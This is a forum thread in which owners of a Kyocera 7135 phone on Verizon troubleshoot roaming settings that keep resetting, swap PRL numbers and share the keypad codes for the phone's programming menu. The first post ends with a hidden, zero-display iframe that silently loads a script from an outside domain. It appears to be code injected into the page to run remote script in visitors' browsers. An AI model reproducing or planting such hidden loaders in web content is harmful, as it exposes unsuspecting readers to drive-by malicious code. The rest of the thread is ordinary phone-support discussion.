+ Reply to Thread
Page 1 of 2 1 2 LastLast
Results 1 to 20 of 35
  1. #1
    Registered User
    Join Date
    12-21-2002
    Posts
    18

    Can't keep 7135 on automatic roam

    I have the AC plan with Verizon. I have set my phone to automatic roam, but, it will keep that setting for a while, but, then it goes back to "no roaming". Anybody got any thoughts on that.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    10-25-2002
    Posts
    90

    Same Here--

    It does the same thing for me. Also it gets much worse reception than any of my other phones. Constantly losing signal and "Searching".

    Also the PRL is set to 50068 and my other phones are all on 50069?

    Maybe Verizon knew something we didn't?

  3. #3
    Registered User
    Join Date
    10-18-2001
    Location
    Montreal,Canada
    Posts
    103
    you have to change it in the programation of the phone to automatic:
    1:dial 111111
    2:scroll down the menu of the phone and you will have a new option
    3:Then enter 000000
    4:go in programation and change it there it will not come back to no roaming

    Marc-Andre

  4. #4
    Registered User
    Join Date
    12-21-2002
    Posts
    18
    My PRL is also 50068

  5. #5
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    For what it's worth, I just updated the PRL on my StarTac and it is 50068.

  6. #6
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Set the roaming prefernce in the menu and power cycle the handset and see if that gets it to stick.

  7. #7
    Registered User
    Join Date
    12-21-2002
    Posts
    18
    Nope, when you power down/up is when it resets to "no roaming"

  8. #8
    Registered User
    Join Date
    12-21-2002
    Posts
    18
    Prospects - Your method seems to have worked. Thanks. It took me a while to figure out how to follow your directions, but, one I got in to the programing it was fun. I bet I could screw up a bunch of stuff in there.

  9. #9
    Registered User
    Join Date
    10-18-2001
    Location
    Montreal,Canada
    Posts
    103
    You are welcome BJ sory for the direction i'm french so i do my best

    marc-Andre

  10. #10
    Registered User
    Join Date
    01-24-2003
    Posts
    4

    Can't keep 7135 on automatic roam

    I need to revisit this issue as I too have experienced the "can't keep 7135 on automatic roam" symptom.

    I traveled outside my home area and into an extended roam area where my 7135 would not pick up a signal. When powered down and back up the 7135 would always revert to a "No Roaming" mode. Even when I switched it to an automatic mode it would still not pick up a signal.

    When I drove into a "home" area the phone promptly picked up a tower.

    My wife's Motorola 270 would pick up an extended roaming tower normally so I know the signal should have been there.

    Can somebody shed some light on this and perhaps give a clearer explanation on how to program the phone to keep the "automatic" roam option enabled?

    Much appreciated
    Brian

  11. #11
    Registered User
    Join Date
    01-14-2003
    Posts
    173
    Brian:

    You have to program the phone to do it as follows:

    1. In phone mode, enter "111111" on the keypad. This will create additional choices on the menu.
    2. Scroll down the menu to "Options". Press Ok.
    3. Scroll down the next menu to "Programming" and press Ok.
    4. Enter "000000" as the code.
    5. Press the "More..." button on the next screen.
    6. On the upper right corner menu, select "System".
    7. On this page, change the "Preferred Serving System" to "Automatic".
    8. Press "Save & Exit", power off and on and you're set.

  12. #12
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    Just for the heck of it, I also followed JeffC's instructions and found that mine was set to "Standard." But when I looked at the options, the only two were "Automatic" and "No roaming." There was no "Standard" option. I changed it to automatic but now I am wondering why mine was set to an option that did not exist in the menu? Any ideas?

  13. #13
    Registered User
    Join Date
    01-24-2003
    Posts
    4

    Can't keep 7135 on automatic roam

    JeffC
    Thanks for the excellent direction. That did it.

  14. #14
    Registered User
    Join Date
    01-24-2003
    Posts
    4

    Can't keep 7135 on automatic roam

    Inoble
    hmmm ... I just went back in and looked at the programming options again. I did not have a "standard" choice in the programming mode. Just "automatic" and "no roaming".

  15. #15
    ep
    ep is offline
    Registered User ep's Avatar
    Join Date
    08-28-2001
    Posts
    186

    Re: Same Here--

    Originally posted by CloudyI
    50068 and my other phones are all on 50069?
    Maybe Verizon knew something we didn't?
    AFAIK, 50068 is for the main phone on a family share plan and 50069 is for the family phones. At least that's how it is for me.
    --ep

  16. #16
    Registered User
    Join Date
    08-17-2002
    Posts
    444

    Re: Can't keep 7135 on automatic roam

    Originally posted by Brimark
    Inoble
    hmmm ... I just went back in and looked at the programming options again. I did not have a "standard" choice in the programming mode. Just "automatic" and "no roaming".
    Hmmm. Well, since I changed it to automatic and my phone is still working, I will just have to chalk it up to one of the mysteries of the 7135.

    Lnoble

  17. #17
    Registered User Kevinw's Avatar
    Join Date
    10-22-2001
    Posts
    206
    Originally posted by lnoble
    Just for the heck of it, I also followed JeffC's instructions and found that mine was set to "Standard." But when I looked at the options, the only two were "Automatic" and "No roaming." There was no "Standard" option. I changed it to automatic but now I am wondering why mine was set to an option that did not exist in the menu? Any ideas?
    Same here, the option was preset with the words "Standard" in it, yet the drop down has only "Automatice and "No Roaming" as choices. I set it to "Automatic". Closed, powered down and up and then went back to check it and it was still "Automatic"

    Go figure ?:eyecrazy

  18. #18
    Registered User
    Join Date
    03-08-2002
    Posts
    325
    Originally posted by Kevinw
    Same here, the option was preset with the words "Standard" in it, yet the drop down has only "Automatice and "No Roaming" as choices. I set it to "Automatic". Closed, powered down and up and then went back to check it and it was still "Automatic"

    Go figure ?:eyecrazy
    I did the same thing, but when I powered it back up it went back to "Standard." Does anyone know if this setting matters?

  19. #19
    Registered User
    Join Date
    03-08-2002
    Posts
    325
    Originally posted by RMSko
    I did the same thing, but when I powered it back up it went back to "Standard." Does anyone know if this setting matters?
    I was actually incorrect. It only went back to standard when I did it in the Phone Preferences. When I did it with programming it stuck.

  20. #20
    Registered User Kevinw's Avatar
    Join Date
    10-22-2001
    Posts
    206

    Re: Re: Can't keep 7135 on automatic roam

    Originally posted by lnoble
    Hmmm. Well, since I changed it to automatic and my phone is still working, I will just have to chalk it up to one of the mysteries of the 7135.
    Lnoble
    Anybody had any problems since we changed this from "standard" to "automatic" yesterday. I noticed I seem to have a "blinking R" on my phone almost all the time, even though I'm obviously in my home zone. Actually I had this even before we did this. Don't know why this is? Any guesses.

    Then last night I travelled about 20 miles away into the city. (Phoenix) and couldn't make a call. Either I couldn't get a connection at all or I would get "Welcome to American roaming Services" which I have no idea what that is. For sure I was not outside of the Home Area.

    Ideas, should I call Verizon or Kyo whether I got the right PRL?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts